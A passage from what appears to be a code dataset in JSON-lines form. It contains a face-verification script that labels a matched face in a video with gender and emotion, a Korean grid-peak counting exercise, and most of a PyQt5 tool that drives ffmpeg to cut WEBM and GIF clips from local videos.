i in range(30):\n\t\tcreate_datafiles(30, i+1, 1000)\n\n\tfor i in range(100):\n\t\tcreate_datafiles(1, i+1, 300)\n\n\n\n","sub_path":"process_adult_data.py","file_name":"process_adult_data.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"181219026","text":"\"\"\"\naioz.aiar.truongle - Jun 02, 2020\n\n\"\"\"\nimport cv2\nimport os\nimport glob\nimport argparse\nimport numpy as np\nfrom config import Config\nfrom inference.utils import utils\nfrom inference.api.face_detection_api import FaceDetectionApi\nfrom inference.api.face_ft_extractor_api import FaceFtExtractorApi\nfrom inference.models.wrapper.gender_detection_efficent_net import GenderDetectionPb\nfrom inference.models.wrapper.emotion_efficent_net import ExpressionDetectionPb\n\nparse = argparse.ArgumentParser()\nparse.add_argument(\"-i\", \"--input_dir\", type=str, default=\"data/db_video/USHER\")\nparse.add_argument(\"-o\", \"--output_dir\", type=str, default=\"data/test_video/hiv00004_res\")\nargs = parse.parse_args()\n\nINPUT_DIR = args.input_dir\nOUTPUT_DIR = args.output_dir\nOUT_VIDEO_PATH = \"data/test_video/hiv00004_res_.mp4\"\nSTEP = 10\n\nparams = {'FILTER_BOX_SIZE': 20,\n 'RESIZE_FRAME_RATIO': 1,\n 'HEAD_POSE_THRESH': 30,\n 'FACE_SIZE_OUTPUT': 112}\n\n\ndef vis(image, bbox, name, gen, emo, color=(0, 0, 255)):\n xmin, ymin, xmax, ymax = [int(x) for x in bbox]\n color = color\n font = cv2.FONT_HERSHEY_SIMPLEX\n font_scale = 1.5\n thickness = 3\n # draw bbox\n cv2.rectangle(image, (xmin, ymin), (xmax, ymax), color, thickness)\n # Draw name\n label = name\n text_size = cv2.getTextSize(label, font, font_scale, thickness)\n cv2.rectangle(image,\n (xmin, ymin - 10 - text_size[0][1]),\n (xmin + 10 + text_size[0][0], ymin),\n color, -1)\n cv2.putText(image, label,\n (xmin + 5, ymin - 5),\n cv2.FONT_HERSHEY_SIMPLEX,\n 1.5, (255, 255, 255), 3)\n\n text_size = cv2.getTextSize(gen, font, font_scale, thickness)\n txt_loc = (xmin, ymax + 10 + text_size[0][1])\n cv2.putText(image,\n text=gen,\n org=txt_loc,\n fontFace=font,\n fontScale=font_scale,\n color=color,\n thickness=thickness)\n\n # EXPR\n text_size = cv2.getTextSize(emo, font, font_scale, thickness)\n txt_loc = (xmin, ymax + 30 + 2*text_size[0][1])\n cv2.putText(image,\n text=emo,\n org=txt_loc,\n fontFace=font,\n fontScale=font_scale,\n color=color,\n thickness=thickness)\n\ndef main():\n os.makedirs(OUTPUT_DIR, exist_ok=True)\n config = Config()\n face_detection_api = FaceDetectionApi(config=config, params=params)\n print('\\nhere\\n')\n face_ft_extractor = FaceFtExtractorApi(config=config)\n print('\\nhere\\n')\n gender_estimator = GenderDetectionPb(config=config)\n emo_estimation = ExpressionDetectionPb(config=config)\n\n\n face_sample = \"data/test_video/USHER - DEA_000030.jpg\"\n # face_sample = \"data/test_video/sample.jpg\"\n \n video_pth = \"data/test_video/hiv00004.mp4\"\n cap = cv2.VideoCapture(video_pth)\n vid_w, vid_h = cap.get(cv2.CAP_PROP_FRAME_WIDTH), cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n fps = cap.get(cv2.CAP_PROP_FPS)\n total_frame = cap.get(cv2.CAP_PROP_FRAME_COUNT)\n \n # INIT WRITER\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n out = cv2.VideoWriter(OUT_VIDEO_PATH, fourcc, fps, (int(vid_w), int(vid_h)))\n print(\"[INFO] information: \", vid_w, vid_h, fps)\n count = 0\n \n # GET SAMPLE:\n img_sample = cv2.imread(face_sample)\n img_sample = cv2.cvtColor(img_sample, cv2.COLOR_BGR2RGB)\n img_sample = np.transpose(img_sample, (2, 0, 1))\n face_ft_sample = face_ft_extractor.proceed(img_sample)\n emo_s = np.zeros(2)\n list_emo = [\"Hap\", \"Sad\"]\n\n # Feature list\n feature_list = []\n \n while cap.isOpened() and count <= 180*30:\n ret, frame = cap.read()\n if ret:\n # DETECTION\n boxes, faces, elapsed = face_detection_api.proceed(frame=frame, vid_w=vid_w, vid_h=vid_h)\n if boxes is not None:\n sim = []\n for box, face in zip(boxes, faces):\n face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\n face = np.transpose(face, (2, 0, 1))\n face_ft = face_ft_extractor.proceed(face)\n _sim = np.dot(face_ft_sample, face_ft.T)\n sim.append(_sim)\n sim = np.asarray(sim)\n indices = np.argmax(sim)\n print(sim[indices])\n if sim[indices] > 0.3:\n face = faces[indices]\n face = cv2.cvtColor(face, cv2.COLOR_RGB2GRAY)\n face = cv2.cvtColor(face, cv2.COLOR_GRAY2BGR)\n emo = emo_estimation.process_prediction(face)[0]\n if emo in list_emo:\n idx = list_emo.index(emo)\n emo_s[idx] += 1\n emo_percent = emo_s / np.sum(emo_s)\n emo_percent = np.around(emo_percent, decimals=2)\n print(emo_s)\n if count > 10:\n emo_str = \"Pos: %s, Neg: %s\" % (emo_percent[0], emo_percent[1])\n else:\n emo_str = ''\n gen = gender_estimator.process_prediction(face, use_tta=True)\n gen_str = \"M\" if gen > 0.5 else \"F\"\n vis(image=frame, bbox=boxes[indices], name=\"DAE\", gen=gen_str, emo=emo_str)\n print(\"Frame: {}, Time: {}\".format(count, elapsed))\n out.write(frame)\n frame = cv2.resize(frame, (int(vid_w//3), int(vid_h//3)))\n cv2.imshow(\"abc\", frame)\n count += 1\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n cap.release()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","sub_path":"run_face_verification.py","file_name":"run_face_verification.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159941270","text":"import sys\nN = int(sys.stdin.readline().rstrip())\na = [list(map(int,sys.stdin.readline().split())) for _ in range(N)]\ncnt = 0\n# point_n,point_s,point_w,point_e = 0\nfor i in range(N):\n for j in range(N):\n try:\n point_n = a[i-1][j]\n point_s = a[i+1][j]\n point_w = a[i][j-1]\n point_e = a[i][j+1]\n if i - 1 == -1:\n point_n = 0\n if j - 1 == -1:\n point_w = 0\n except:\n if i + 1 == N:\n point_n = a[i - 1][j]\n point_w = a[i][j - 1]\n point_s = 0\n if j + 1 == N:\n point_e = 0\n else:\n point_e = a[i][j + 1]\n if j + 1 == N:\n point_e = 0\n # 이거를 어떻게 처리해야할까..?\n # print(f'i = {i}, j = {j} , n = {point_n}, s = {point_s}, w = {point_w}, e = {point_e}')\n if a[i][j] > point_n and a[i][j] > point_s and a[i][j] > point_w and a[i][j] > point_e:\n cnt+=1\n # print(i,j)\nprint(cnt)","sub_path":"Inflearn/파이썬 알고리즘 문제풀이(코딩테스트 대비)/섹션 3/9. 봉우리/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"548147275","text":"import subprocess\nimport glob\nimport os, sys\nimport platform\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nos.chdir(os.path.dirname(os.path.abspath(sys.argv[0])))\n\n#sudo pyinstaller -F --add-data 'ffmpeg:.' --add-data 'ffprobe:.' webmarizer.py\n\n# Lots of terrible global variables. Let's promise ourselves to fix this later, mkay?\nstopped = False\nthumbnailMode = False\nbitrate = 1500\nvideosList = []\nnumWEBM = 5\nlenLimit = 0\ntotalSeconds = 0\nfileSize = 0\noutputDuration = 8\nnumFiles = 0\noutputWidth = 500\nreturnedVideoList = False \nselectedVideo = \"\"\naudioEnabled = False\naudioDisable = '-an'\ntargetSizeSet = False\noutput_type = 'WEBM'\nsingle_mode = False\ntime_array = [0,0,0]\nthumbnailNumTilesSide = 2\nwadsworthConstant = 30\nwadsworthEnabled = True\nFFmpegProcess = QtCore.QProcess()\n\n# We'll need this to access ffmpeg & ffprobe once pyinstaller has created one-file executable\n# Returns some sort of temp directory\ndef resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n path = os.path.join(base_path, relative_path)\n return path\n\n# Here's where we can find ffmpeg & ffprobe. Check platform first, though.\ndef getDependencyPath(dependency):\n if (platform.system() == 'Windows'):\n if (dependency == 'ffmpeg'):\n path = resource_path('ffmpeg.exe')\n else:\n path = resource_path('ffprobe.exe')\n else:\n if (dependency == 'ffmpeg'):\n path = resource_path('ffmpeg')\n else:\n path = resource_path('ffprobe')\n return path\n\n\ndef createGif(fileName, startTime, ffmpeg_path):\n fileName_gif = os.path.splitext(fileName)[0] + '_' + str(numFiles) + '.gif'\n scaleString = 'scale=' + str(outputWidth) + ':-2'\n filters='fps=20,scale=' + str(outputWidth) + ':-1:flags=lanczos'\n \n # 1st Generate a pallete with ffmpeg\n args_palette = [\n '-ss', str(startTime),\n '-t', str(outputDuration),\n '-i' , fileName,\n '-vf', filters+\",palettegen\",\n '-y', 'palette.png'\n ]\n\n # 2nd Generate the gif using the palette\n args_gif = [\n '-ss', str(startTime),\n '-t', str(outputDuration),\n '-i' , fileName,\n '-i', 'palette.png'\n ]\n\n gif_opt_withSize = [\n '-fs', str(fileSize/1000) + \"M\",\n '-lavfi', filters+\"[x];[x][1:v]paletteuse\",\n '-y', fileName_gif\n ]\n\n gif_opts_noSize = [\n '-lavfi', filters+\"[x];[x][1:v]paletteuse\",\n '-y', fileName_gif\n ]\n\n if targetSizeSet:\n args_gif.extend(gif_opt_withSize)\n else:\n args_gif.extend(gif_opts_noSize)\n\n print(\"THE FILE SIZE IS: \" + str(fileSize/1000) + \"M\")\n print(\"Args palette: \" + str(args_palette))\n print(\"Args gif: \" + str(args_gif))\n\n GUI.setStatusText(\"Currently creating: \" + fileName_gif)\n FFmpegProcess.setProcessChannelMode(QtCore.QProcess.MergedChannels)\n app.processEvents()\n\n if (stopped == False):\n FFmpegProcess.execute(ffmpeg_path, args_palette)\n FFmpegProcess.waitForFinished(-1)\n FFmpegProcess.execute(ffmpeg_path, args_gif)\n FFmpegProcess.waitForFinished(-1)\n os.remove(\"palette.png\")\n\n# Use ffmpeg to create WEBM and read its stdout. To-Do:Use some regex later for progress bar\ndef createWebm(fileName, startTime, ffmpeg_path):\n fileName_webm = os.path.splitext(fileName)[0] + '_' + str(numFiles) + '.webm'\n scaleString = 'scale=' + str(outputWidth) + ':-2'\n \n \n \n \n args = ['-y',\n '-ss', str(startTime),\n '-t', str(outputDuration),\n '-i' , fileName,\n '-vf', scaleString,\n '-c:v', 'libvpx',\n '-b:v', str(bitrate)+\"K\",\n '-b:a', '96K',\n '-c:a', 'libvorbis']\n\n if not audioEnabled:\n args.append(audioDisable)\n \n args.append(fileName_webm)\n print(\"\\n\\n\\n\" + str(args) + \"\\n\\n\\n\")\n GUI.setStatusText(\"Currently creating: \" + fileName_webm)\n FFmpegProcess.setProcessChannelMode(QtCore.QProcess.MergedChannels)\n app.processEvents()\n if (stopped == False):\n FFmpegProcess.waitForFinished(-1)\n FFmpegProcess.execute(ffmpeg_path, args)\n FFmpegProcess.waitForFinished(-1)\n\n# Searches current directory for .mp4,.wmv,.avi, .mpeg, and .mkv videos\ndef createVideoList():\n for fileType in [\"*.mp4\", \"*.wmv\",\"*.avi\", \"*.mpeg\", \"*.mkv\"]:\n aVideo = glob.glob(fileType)\n if (len(aVideo) > 0):\n videosList.extend(aVideo) \n global returnedVideoList\n returnedVideoList = True\n return (videosList)\n\ndef join_videos(video, ffmpeg_path):\n GUI.setStatusText(\"Stiching WEBMs. This may take a while.\")\n FFmpegProcess.setProcessChannelMode(QtCore.QProcess.MergedChannels)\n app.processEvents()\n fileCount = 1\n previousColumnOutput = ''\n rowArray = []\n \n for row in range((thumbnailNumTilesSide)):\n firstInColumn = True\n for column in range(0,(thumbnailNumTilesSide-1)): \n if firstInColumn:\n fileName1 = os.path.splitext(video)[0] + '_' + str(fileCount) + '.webm'\n fileCount = fileCount + 1\n else:\n fileName1 = previousColumnOutput\n fileName2 = os.path.splitext(video)[0] + '_' + str(fileCount) + '.webm'\n output = os.path.splitext(video)[0] + '_' + str(fileCount) + '_' + str(row) + '.webm'\n previousColumnOutput = output\n \n \n args = ['-y',\n '-i' , fileName1,\n '-i' , fileName2,\n '-c:v', 'libvpx',\n '-b:v', str(bitrate)+\"K\",\n '-b:a', '96K',\n '-c:a', 'libvorbis']\n\n extendSettings1 = ['-filter_complex', '[0:v][1:v]hstack[v];[0:a][1:a]amerge=inputs=2[a]',\n '-map', '[v]',\n '-map', '[a]',\n '-ac', '2']\n\n extendSettings2 = ['-filter_complex', 'hstack']\n\n if not audioEnabled:\n args.append(audioDisable)\n for setting in extendSettings2:\n args.append(setting)\n else:\n for setting in extendSettings1:\n args.append(setting)\n \n\n \n print(fileName1)\n print(fileName2)\n print(output+\"\\n\")\n #print(\"Row: \" + str(row))\n #print(\"Column: \" + str(column))\n\n args.append(output)\n #print(args)\n FFmpegProcess.execute(ffmpeg_path, args)\n FFmpegProcess.waitForFinished(-1)\n fileCount = fileCount + 1\n firstInColumn = False\n if (column == (thumbnailNumTilesSide-1)-1):\n print(\"lol\")\n rowArray.append(output)\n print(rowArray)\n \n firstPair = True\n previousRow = ''\n for index in range(len(rowArray)-1):\n print(\"Current index is: \" + str(index))\n if firstPair:\n fileName1 = rowArray[index]\n else: \n fileName1 = previousRow\n firstPair = False\n\n if (index < len(rowArray)-1):\n print(rowArray)\n print(\"Length: \" + str(len(rowArray)))\n print(\"Index: \" + str(index))\n fileName2 = rowArray[index+1]\n else:\n print(\"This should never ever happen!\")\n\n\n output = os.path.splitext(video)[0] + '_row_' + str(index) + '.webm'\n if (index == (len(rowArray) - 2)):\n print(\"ayooo\")\n output = os.path.splitext(video)[0] + '_THUMBNAIL.webm'\n previousRow = output\n \n args2 = ['-y',\n '-i' , fileName1,\n '-i' , fileName2,\n '-c:v', 'libvpx',\n '-b:v', str(bitrate)+\"K\",\n '-b:a', '96K',\n '-c:a', 'libvorbis']\n \n extendSettings1 = ['-filter_complex', '[0:v][1:v]vstack[v];[0:a][1:a]amerge=inputs=2[a]',\n '-map', '[v]',\n '-map', '[a]',\n '-ac', '2']\n\n extendSettings2 = ['-filter_complex', 'vstack']\n \n if not audioEnabled:\n args2.append(audioDisable)\n for setting in extendSettings2:\n args2.append(setting)\n else:\n for setting in extendSettings1:\n args2.append(setting)\n args2.append(output)\n print(\"\\n\\n\\n\\n\\n\"+str(args2)+\"\\n\\n\\n\\n\\n\")\n print(fileName1)\n print(fileName2)\n print(output+'\\n')\n FFmpegProcess.execute(ffmpeg_path, args2)\n FFmpegProcess.waitForFinished(-1)\n\n# Takes video name, splits video into intervals, creates WEBM starting at each interval\ndef processVideo(aVideo):\n if aVideo == '':\n GUI.setStatusText(\"Please select a video from list when creating WEBM/GIF from single video.\")\n return\n global totalSeconds, stopped, numWEBM\n ffmpeg_path = getDependencyPath('ffmpeg')\n ffprobe_path = getDependencyPath('ffprobe')\n args = [\n ffprobe_path ,\n '-v' , 'quiet',\n '-show_entries' , 'format=duration',\n '-of' , 'csv=%s' % (\"p=0\"),\n '-i' , aVideo\n ]\n\n # We can use ffprobe to check the number of seconds in the video\n totalSeconds = subprocess.check_output(args)\n\n # Y u do dis? Have to look into why this is necessary.\n totalSeconds = float(totalSeconds.decode(\"utf-8\"))\n \n # Makes sure WEBM length \"L\" isn't created at startTime + L > Length of video\n getLenLimit()\n\n # Let's skip first 30% of video. Add opt for this later.\n startTime = ( (totalSeconds) * wadsworthConstant) / 100\n interval = ( int(totalSeconds) - startTime ) / numWEBM\n\n if thumbnailMode:\n interval = ( int(totalSeconds) - startTime ) / (thumbnailNumTilesSide**2)\n numWEBM = 1 #Fix this later - poor control of logic flow. Same with range loop.\n\n if single_mode:\n numWEBM = 1\n\n for i in range(numWEBM):\n app.processEvents() \n if (stopped == False): \n if startTime >= lenLimit:\n break\n global numFiles\n numFiles += 1\n \n if output_type == 'WEBM':\n if single_mode:\n custom_start_time = (time_array[0] * 3600) + (time_array[1] * 60) + time_array[2]\n createWebm(aVideo, custom_start_time,ffmpeg_path)\n elif thumbnailMode:\n print(thumbnailNumTilesSide**2)\n global bitrate, outputWidth\n for j in range((thumbnailNumTilesSide**2)):\n createWebm(aVideo, startTime, ffmpeg_path)\n startTime += interval\n numFiles += 1\n join_videos(aVideo,ffmpeg_path)\n else:\n createWebm(aVideo, startTime, ffmpeg_path)\n else:\n if single_mode:\n custom_start_time = (time_array[0] * 3600) + (time_array[1] * 60) + time_array[2]\n createGif(aVideo, custom_start_time,ffmpeg_path)\n else:\n createGif(aVideo, startTime,ffmpeg_path)\n\n startTime += interval\n else:\n app.processEvents() \n GUI.setStatusText(\"Process killed.\")\n\n# Makes sure WEBM length \"L\" isn't created at startTime + L > Length of video\ndef getLenLimit():\n global lenLimit\n lenLimit = totalSeconds - outputDuration - 1\n\n# Starts going through all the videos and initiates WEBM creation process\ndef init():\n global stopped\n stopped = False\n for video in videosList:\n if (stopped == False):\n global numFiles\n numFiles = 0\n processVideo(video)\n else:\n app.processEvents() \n GUI.setStatusText(\"Process killed.\")\n if (stopped == False):\n GUI.setStatusText(\"Finished!\")\n\n# Form implementation generated from reading ui file 'webmarizer_template.ui'\n# Created by: PyQt5 UI code generator 5.10.1\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n #===================================================================#\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(829, 330)\n MainWindow.setDocumentMode(False)\n MainWindow.setTabShape(QtWidgets.QTabWidget.Triangular)\n MainWindow.setUnifiedTitleAndToolBarOnMac(True)\n MainWindow.setStyleSheet(\"\"\"\n background-color: rgb(255, 255, 255);\n padding:0px;\n \"\"\")\n #===================================================================#\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n #===================================================================#\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n #===================================================================#\n spacerItem = QtWidgets.QSpacerItem(20, 25, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)\n spacerItem1 = QtWidgets.QSpacerItem(20, 25, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)\n spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n #===================================================================#\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n #===================================================================#\n self.generalTab = QtWidgets.QWidget()\n self.advancedTab = QtWidgets.QWidget()\n #===================================================================#\n self.layoutWidget = QtWidgets.QWidget(self.generalTab)\n self.layoutWidget1 = QtWidgets.QWidget(self.advancedTab)\n self.layoutWidget_2 = QtWidgets.QWidget(self.advancedTab)\n #===================================================================#\n self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget)\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget_2)\n self.verticalLayout_3 = QtWidgets.QVBoxLayout()\n self.verticalLayout_4 = QtWidgets.QVBoxLayout()\n self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.layoutWidget1)\n self.verticalLayout_6 = QtWidgets.QVBoxLayout()\n #===================================================================#\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout()\n #===================================================================#\n self.videoListTitleLabel = QtWidgets.QLabel(self.generalTab)\n self.statusLabel = QtWidgets.QLabel(self.centralwidget)\n self.durationLabel = QtWidgets.QLabel(self.layoutWidget)\n self.sizeLabel = QtWidgets.QLabel(self.layoutWidget)\n self.numWEBMLabel = QtWidgets.QLabel(self.layoutWidget)\n self.startTimeLabel = QtWidgets.QLabel(self.layoutWidget1)\n self.gifModeLabel = QtWidgets.QLabel(self.layoutWidget1)\n self.enableAudioLabel = QtWidgets.QLabel(self.layoutWidget1)\n self.thumbnailModeLabel = QtWidgets.QLabel(self.layoutWidget1)\n self.targetSizeCheckmarkLabel = QtWidgets.QLabel(self.layoutWidget1)\n self.targetFileSizeLabel = QtWidgets.QLabel(self.layoutWidget_2)\n self.bitrateLabel = QtWidgets.QLabel(self.layoutWidget_2)\n self.wadsworthLabel = QtWidgets.QLabel(self.layoutWidget1)\n #===================================================================#\n self.numWEBMSlider = QtWidgets.QSlider(self.layoutWidget)\n self.durationSlider = QtWidgets.QSlider(self.layoutWidget)\n self.sizeSlider = QtWidgets.QSlider(self.layoutWidget)\n self.fileSizeSlider = QtWidgets.QSlider(self.layoutWidget_2)\n self.bitRateSlider = QtWidgets.QSlider(self.layoutWidget_2)\n #===================================================================#\n self.stopBtn = QtWidgets.QPushButton(self.centralwidget)\n self.startSingleBtn = QtWidgets.QPushButton(self.centralwidget)\n self.createBtn = QtWidgets.QPushButton(self.centralwidget)\n #===================================================================#\n self.timeEdit = QtWidgets.QTimeEdit(self.layoutWidget1)\n #===================================================================#\n self.listWidget = QtWidgets.QListWidget(self.generalTab)\n #===================================================================#\n self.thumbnailModeCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n self.startTimeCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n self.gifModeCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n self.audioCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n self.targetFileSizeCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n self.wadsworthCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n #===================================================================#\n self.thumbnailDropdown = QtWidgets.QComboBox(self.layoutWidget1)\n #===================================================================#\n font = QtGui.QFont()\n #===================================================================#\n self.stopBtn.setObjectName(\"stopBtn\")\n self.statusLabel.setObjectName(\"statusLabel\")\n self.thumbnailModeLabel.setObjectName(\"thumbnailModeLabel\")\n self.thumbnailModeCheckBox.setObjectName(\"thumbnailModeCheckBox\")\n self.startTimeCheckBox.setObjectName(\"startTimeCheckBox\")\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.verticalLayout_6.setObjectName(\"verticalLayout_6\")\n self.verticalLayout_4.setObjectName(\"verticalLayout_4\")\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.layoutWidget.setObjectName(\"layoutWidget\")\n self.tabWidget.setObjectName(\"tabWidget\")\n self.generalTab.setObjectName(\"generalTab\")\n self.durationLabel.setObjectName(\"durationLabel\")\n self.durationSlider.setObjectName(\"durationSlider\")\n self.sizeLabel.setObjectName(\"sizeLabel\")\n self.sizeSlider.setObjectName(\"sizeSlider\")\n self.numWEBMLabel.setObjectName(\"numWEBMLabel\")\n self.numWEBMSlider.setObjectName(\"numWEBMSlider\")\n self.videoListTitleLabel.setObjectName(\"videoListTitleLabel\")\n self.advancedTab.setObjectName(\"advancedTab\")\n self.layoutWidget_2.setObjectName(\"layoutWidget_2\")\n self.verticalLayout_5.setObjectName(\"verticalLayout_5\")\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\n self.bitrateLabel.setObjectName(\"bitrateLabel\")\n self.bitRateSlider.setObjectName(\"bitRateSlider\")\n self.targetFileSizeLabel.setObjectName(\"targetFileSizeLabel\")\n self.fileSizeSlider.setObjectName(\"fileSizeSlider\")\n self.layoutWidget1.setObjectName(\"layoutWidget1\")\n self.targetFileSizeCheckBox.setObjectName(\"targetFileSizeCheckBox\")\n self.targetSizeCheckmarkLabel.setObjectName(\"targetSizeCheckmarkLabel\")\n self.audioCheckBox.setObjectName(\"audioCheckBox\")\n self.enableAudioLabel.setObjectName(\"enableAudioLabel\")\n self.gifModeCheckBox.setObjectName(\"gifModeCheckBox\")\n self.gifModeLabel.setObjectName(\"gifModeLabel\")\n self.startTimeLabel.setObjectName(\"startTimeLabel\")\n self.timeEdit.setObjectName(\"timeEdit\")\n self.wadsworthCheckBox.setObjectName(\"wadsworthCheckBox\")\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n self.createBtn.setObjectName(\"createBtn\")\n self.startSingleBtn.setObjectName(\"startSingleBtn\")\n #===================================================================#\n tabStyleString = \"\"\"\n QTabBar::tab {\n width: 300px;\n }\n\n QTabWidget::tab-bar {\n top:30;\n padding-left:0;\n background:transparent;\n width:835px;\n }\n \n QTabWidget::pane {\n border: 0 solid white;\n }\n \"\"\"\n sliderStyleString = \"\"\"\n QSlider::handle:horizontal {\n background: qlineargradient(x1:0, y1:0, x2:1, y2:1, stop:0 #9595ff, stop:1 #1e95ff);\n border: 1px solid #5c5c5c;\n width: 18px;\n margin: -2px 0;\n border-radius: 3px;\n }\n\n QSlider::groove:horizontal {\n border: 1px solid #999999;\n height: 9px; \n background: qlineargradient(x1:0, y1:0, x2:0, y2:1, stop:0 #B1B1B1, stop:1 #c4c4c4);\n margin: 2px 0;\n }\n \"\"\"\n #===================================================================#\n font.setFamily(\"Thonburi\")\n font.setBold(False)\n font.setWeight(50)\n #===================================================================#\n self.tabWidget.setFont(font)\n self.tabWidget.setLayoutDirection(QtCore.Qt.LeftToRight)\n self.tabWidget.setAutoFillBackground(False)\n self.tabWidget.setTabShape(QtWidgets.QTabWidget.Rounded)\n self.tabWidget.setDocumentMode(False)\n self.tabWidget.setGeometry(QtCore.QRect(0, -30, 831, 341))\n self.tabWidget.addTab(self.generalTab, \"\")\n self.tabWidget.addTab(self.advancedTab, \"\")\n self.tabWidget.setStyleSheet(tabStyleString)\n #===================================================================#\n self.generalTab.setAutoFillBackground(False)\n self.generalTab.setStyleSheet(\"\"\"\n QTabBar {\n qproperty-drawBase: 0;\n }\n \"\"\")\n #===================================================================#\n self.layoutWidget.setGeometry(QtCore.QRect(20, 40, 381, 211))\n #===================================================================#\n sizePolicy.setHeightForWidth(self.wadsworthCheckBox.sizePolicy().hasHeightForWidth())\n self.wadsworthCheckBox.setSizePolicy(sizePolicy)\n self.wadsworthCheckBox.setText(\"\")\n #===================================================================#\n self.wadsworthLabel.setEnabled(True)\n self.wadsworthLabel.setFont(font)\n self.wadsworthLabel.setTextFormat(QtCore.Qt.RichText)\n self.wadsworthLabel.setObjectName(\"wadsworthLabel\")\n #===================================================================#\n self.durationLabel.setEnabled(True)\n self.durationLabel.setFont(font)\n self.durationLabel.setStyleSheet(\"\")\n self.durationLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.durationSlider.setMinimum(1)\n self.durationSlider.setMaximum(30)\n self.durationSlider.setOrientation(QtCore.Qt.Horizontal)\n self.durationSlider.setStyleSheet(sliderStyleString)\n #===================================================================#\n self.sizeLabel.setEnabled(True)\n self.sizeLabel.setFont(font)\n self.sizeLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.sizeSlider.setMinimum(300)\n self.sizeSlider.setMaximum(3000)\n self.sizeSlider.setOrientation(QtCore.Qt.Horizontal)\n self.sizeSlider.setStyleSheet(sliderStyleString)\n #===================================================================#\n self.numWEBMLabel.setEnabled(True)\n self.numWEBMLabel.setFont(font)\n self.numWEBMLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.numWEBMSlider.setMinimum(1)\n self.numWEBMSlider.setMaximum(50)\n self.numWEBMSlider.setOrientation(QtCore.Qt.Horizontal)\n self.numWEBMSlider.setStyleSheet(sliderStyleString) \n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.listWidget.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.listWidget.setGeometry(QtCore.QRect(430, 70, 381, 171))\n self.listWidget.setSizePolicy(sizePolicy)\n self.listWidget.setFont(font)\n self.listWidget.setWordWrap(True)\n self.listWidget.setObjectName(\"listWidget\")\n self.listWidget.setStyleSheet(\"\"\"\n background-color:#fff;\n border:1px solid black;\n \"\"\")\n #===================================================================#\n self.videoListTitleLabel.setGeometry(QtCore.QRect(580, 40, 81, 21))\n self.videoListTitleLabel.setFont(font)\n #===================================================================#\n self.layoutWidget_2.setGeometry(QtCore.QRect(420, 40, 371, 102))\n #===================================================================#\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.addWidget(self.durationLabel)\n self.verticalLayout.addWidget(self.durationSlider)\n self.verticalLayout.addItem(spacerItem)\n self.verticalLayout.addWidget(self.numWEBMLabel)\n self.verticalLayout.addWidget(self.numWEBMSlider)\n self.verticalLayout.addItem(spacerItem1)\n self.verticalLayout.addWidget(self.sizeLabel)\n self.verticalLayout.addWidget(self.sizeSlider)\n #===================================================================#\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_2.addLayout(self.verticalLayout_4)\n #===================================================================#\n self.verticalLayout_3.addLayout(self.horizontalLayout_7)\n self.verticalLayout_3.addLayout(self.horizontalLayout_8)\n #===================================================================#\n self.verticalLayout_4.addLayout(self.verticalLayout_6)\n self.verticalLayout_4.addWidget(self.targetFileSizeLabel)\n 